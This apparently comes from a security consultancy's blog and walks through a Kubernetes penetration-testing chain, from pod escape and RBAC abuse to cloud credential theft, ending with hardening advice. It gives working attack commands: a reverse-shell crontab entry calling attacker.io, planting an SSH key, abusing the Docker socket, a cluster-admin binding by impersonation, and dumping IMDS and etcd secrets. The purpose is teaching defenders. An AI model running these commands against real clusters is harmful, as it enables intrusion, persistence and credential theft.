Kubernetes adoption has outpaced Kubernetes security by a wide margin. Organizations migrate workloads into clusters faster than their security teams can learn the platform's attack surface — and that gap is consistently exploitable. In our Kubernetes penetration tests and cloud security assessments, we achieve cluster-admin from an initial compromised pod in the majority of engagements. The techniques are not novel. The misconfigurations that enable them are simply pervasive.
This post walks through the exact exploitation chain we follow: identifying misconfigurations at the pod level, escaping the container, abusing RBAC to escalate across namespaces, extracting secrets, and ultimately pivoting from the Kubernetes cluster into the underlying cloud account.
Common Kubernetes Misconfigurations
Before any exploitation begins, reconnaissance inside a compromised pod surfaces a predictable set of weaknesses. Across dozens of Kubernetes assessments, the following misconfigurations appear with enough regularity that we treat them as the expected baseline rather than outliers.
Privileged Pods
Pods running with securityContext.privileged: true receive near-complete access to the host kernel. A privileged container shares the host's device namespace, can load kernel modules, and can mount any host filesystem path. This single flag collapses the container boundary entirely.
hostPath Mounts
Mounting host filesystem paths into a container — even read-write mounts of innocuous-looking paths like /var/log — provides lateral movement opportunities. Writable hostPath volumes pointed at sensitive directories such as /etc, /root, or the container runtime socket allow direct host compromise.
Overly Permissive RBAC
ClusterRoleBindings that grant cluster-admin to default service accounts, wildcard verb permissions across core API groups, or the ability to create pods and exec into them are among the most common RBAC findings we document. Many teams grant broad permissions during development and never tighten them before production.
Exposed API Servers
The Kubernetes API server is frequently reachable from inside cluster workloads without authentication controls. Anonymous authentication enabled, or API servers bound to 0.0.0.0 without network policy restrictions, allow any pod to enumerate the cluster and attempt privilege escalation directly against the API.
Default Service Account Tokens
Prior to Kubernetes 1.24, service account tokens were automatically mounted into every pod by default. Many clusters still run workloads that inherit this behaviour or explicitly set automountServiceAccountToken: true. These tokens, readable at /var/run/secrets/kubernetes.io/serviceaccount/token, authenticate directly to the API server.
Pod Escape Techniques
With a foothold inside a container, the objective shifts to breaking out of the container namespace and gaining access to the underlying node. The method depends on what misconfigurations are present.
Privileged Container Breakout
A privileged container exposes all host block devices. By mounting the host root filesystem, an attacker gains read-write access to every file on the node — including /etc/crontab, SSH authorized keys, and the kubelet configuration.
# Inside a privileged container — list host block devices
ls /dev/sd* /dev/nvme*
# Mount the host root filesystem
mkdir /tmp/hostfs
mount /dev/nvme0n1p1 /tmp/hostfs
# Read node credentials or write to crontab for persistence
cat /tmp/hostfs/etc/kubernetes/pki/ca.key
echo '* * * * * root bash -i >& /dev/tcp/attacker.io/4444 0>&1' \
>> /tmp/hostfs/etc/crontab
hostPID and hostNetwork Abuse
Pods launched with hostPID: true share the host process namespace. Every process running on the node is visible and accessible — including processes belonging to other containers. Combined with nsenter, an attacker can attach to the host's PID 1 namespace and execute commands as root on the underlying node.
# hostPID pod — view all host processes
ps aux
# Enter the host's mount namespace via PID 1
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# Now executing on the host node as root
whoami # root
hostname # node-worker-01
Pods with hostNetwork: true share the host network stack. This provides access to services bound only to localhost on the node — including the kubelet API on port 10250 and the etcd client port on control plane nodes.
Mounting the Host Filesystem via Writable hostPath
Even without privileged mode, a writable hostPath volume targeting a sensitive directory achieves host compromise. The classic path is overwriting the host's SSH authorized keys or dropping a cron entry.
# Pod spec — writable hostPath to /root
volumes:
- name: host-root
hostPath:
path: /root
type: DirectoryOrCreate
containers:
- volumeMounts:
- name: host-root
mountPath: /root-host
# Inside the pod — write attacker SSH key to host root
mkdir -p /root-host/.ssh
echo 'ssh-ed25519 AAAAC3Nz... attacker' >> /root-host/.ssh/authorized_keys
# SSH directly to the node
ssh root@<node-ip>
Exploiting the Container Runtime Socket
A hostPath mount exposing the Docker or containerd socket (/var/run/docker.sock or /run/containerd/containerd.sock) is equivalent to root on the host. An attacker can use the socket to launch a new privileged container with a full host mount and execute arbitrary commands outside of any namespace boundary.
# Docker socket exposed — launch privileged container with host mount
docker -H unix:///var/run/docker.sock run -it --privileged \
--pid=host --net=host \
-v /:/host \
ubuntu:22.04 chroot /host bash
RBAC Exploitation
Even without a direct container escape, a compromised pod with a permissive service account token can achieve cluster-wide access entirely through the Kubernetes API. RBAC misconfigurations are, in our experience, the most reliable path to cluster-admin.
Enumerating Service Account Permissions
The first step after obtaining a service account token is enumerating what it can do. The kubectl auth can-i --list command reveals every permitted action for the current identity.
# Read the mounted service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
# Enumerate permissions
kubectl auth can-i --list \
--server=$APISERVER \
--token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Secrets Listing and Extraction
A service account with get or list on the secrets resource in any namespace can extract every secret visible to it — including other service account tokens, TLS certificates, database credentials, and API keys stored by applications.
# List all secrets across all namespaces
kubectl get secrets --all-namespaces \
--server=$APISERVER --token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Extract a specific secret
kubectl get secret prod-db-credentials -n production -o jsonpath='{.data}' \
--server=$APISERVER --token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
| base64 -d
Role Binding Enumeration and Escalation
Enumerating ClusterRoleBindings and RoleBindings surfaces which service accounts hold elevated permissions. A common escalation path involves locating a service account with cluster-admin binding, then finding a pod running with that service account and extracting its token — or creating a new pod that uses it.
# Find all ClusterRoleBindings for cluster-admin
kubectl get clusterrolebindings -o json \
| jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects'
# If we can create pods, launch one using the privileged service account
kubectl run pwn --image=ubuntu \
--serviceaccount=admin-sa \
--restart=Never -it -- /bin/bash
Impersonation
A service account with the impersonate verb on users, groups, or service accounts can act as any identity in the cluster without needing their credentials. This is a direct path to cluster-admin if the permission is granted broadly.
# Impersonate cluster-admin via kubectl --as flag
kubectl get secrets --all-namespaces \
--as=system:admin \
--server=$APISERVER --token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Create a new ClusterRoleBinding as cluster-admin
kubectl create clusterrolebinding attacker-admin \
--clusterrole=cluster-admin \
--serviceaccount=default:default \
--as=system:admin \
--server=$APISERVER --token=$TOKEN \
--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Escalating from Namespace-Scoped to Cluster-Scoped Access
Many teams apply RBAC restrictions at the namespace level, believing this contains the blast radius of a compromised pod. In practice, several paths cross namespace boundaries. A service account with create on pods in any namespace can launch a pod that mounts hostPath volumes, escaping to the node and then reading tokens belonging to higher-privileged pods running anywhere on that node.
From Cluster to Cloud
Achieving cluster-admin is rarely the end of the engagement. The Kubernetes cluster itself runs inside a cloud account, and that cloud account typically has far broader access to the organization's infrastructure. The pivot from cluster to cloud is often the highest-impact finding we deliver.
Cloud Instance Metadata Service (IMDS) Exploitation
Every node in a managed Kubernetes cluster (EKS, GKE, AKE) runs on a cloud VM that has access to the Instance Metadata Service. From inside any pod that can reach the node's network namespace — or directly from a hostNetwork pod — the IMDS is reachable and returns the node's IAM credentials.
# AWS IMDS — retrieve node IAM role credentials (IMDSv1)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns the role name, e.g.: eks-node-role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Returns AccessKeyId, SecretAccessKey, Token
# GCP metadata server — retrieve service account token
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure IMDS — retrieve managed identity token
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
EKS — Node IAM Role to AWS Account Pivot
EKS nodes are EC2 instances with an attached IAM instance profile. The permissions granted to this role commonly include read access to ECR, SSM Parameter Store, and Secrets Manager — all of which may contain credentials for other AWS services. In several engagements, the node role provided ec2:DescribeInstances and ssm:GetParameter across the entire account, yielding database passwords, third-party API keys, and cross-account role ARNs.
# Use extracted node credentials to enumerate the AWS account
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# Identify the role and account
aws sts get-caller-identity
# List SSM parameters
aws ssm describe-parameters --region ca-central-1
# Retrieve a specific parameter
aws ssm get-parameter --name /prod/database/password --with-decryption
GKE — Workload Identity and Default Compute SA
GKE clusters that have not enabled Workload Identity use the Compute Engine default service account for all node VMs. This account has the Editor role on the project by default — granting read and write access to nearly every GCP resource including Cloud Storage buckets, Cloud SQL instances, and Secret Manager secrets. A single hostNetwork pod or IMDS-accessible workload yields project-level access.
Secrets Stored in etcd
On clusters where we achieve access to the control plane or can communicate directly with etcd, all Kubernetes secrets are retrievable in plaintext — etcd does not encrypt data at rest unless explicitly configured to do so. This includes every service account token, TLS private key, and application secret stored in the cluster.
# Query etcd directly (from control plane node or via hostNetwork pod)
ETCDCTL_API=3 etcdctl \
--endpoints=https://127.0.0.1:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get /registry/secrets --prefix --keys-only
# Retrieve and decode a specific secret
ETCDCTL_API=3 etcdctl ... get /registry/secrets/production/prod-db-credentials \
| strings | grep -A5 password
Defensive Guidance
The Kubernetes attack surface is large but the controls required to close the most critical paths are well-defined. The following hardening measures address every technique described in this post.
- Enforce Pod Security Standards. Apply the
restrictedPod Security Standard at the namespace level using the built-in admission controller. This blocks privileged containers, hostPID, hostNetwork, and hostPath mounts by default. Audit mode should be active on all namespaces and enforce mode on production workloads. - Disable automounting of service account tokens. Set
automountServiceAccountToken: falsein the default ServiceAccount spec for every namespace. Mount tokens explicitly only in pods that require API server access, and scope those service accounts to the minimum required permissions. - Implement least-privilege RBAC. Audit ClusterRoleBindings and RoleBindings regularly. Remove wildcard verb grants,
cluster-adminassignments to non-administrative service accounts, and any binding that grantssecretslist or get across all namespaces. Use tools such as rbac-audit or rakkess to surface overly permissive bindings. - Enable etcd encryption at rest. Configure the API server's
--encryption-provider-configto encrypt secrets stored in etcd using AES-GCM or a KMS provider. This ensures that even direct etcd access does not yield plaintext secrets. - Restrict IMDS access with network policy. Apply egress NetworkPolicy rules that block pod access to
169.254.169.254for workloads that do not require cloud IAM credentials. On AWS, enforce IMDSv2 at the node level to require session-oriented token requests, which are significantly harder to abuse from within a pod. - Use Workload Identity instead of node-level IAM roles. On GKE, enable Workload Identity. On EKS, use IAM Roles for Service Accounts (IRSA). These mechanisms bind IAM permissions to specific Kubernetes service accounts rather than to the entire node, eliminating the IMDS lateral movement path for workloads that do not require cloud credentials.
- Never expose the container runtime socket. Docker and containerd socket mounts should be blocked via admission control. There is no legitimate application workload that requires runtime socket access — only monitoring and CI tooling, which should use purpose-built alternatives.
- Audit API server access logs. Enable audit logging on the Kubernetes API server and ship logs to a SIEM. Alert on anomalous patterns:
secrets listfrom unexpected service accounts,pods createwith privileged security contexts, and any use of theimpersonateverb outside of known automation service accounts. - Run periodic Kubernetes penetration tests. Configuration drift is inevitable in dynamic cluster environments. A scheduled external assessment — not just automated scanning — provides the adversarial perspective required to identify chained exploitation paths that individual tools miss.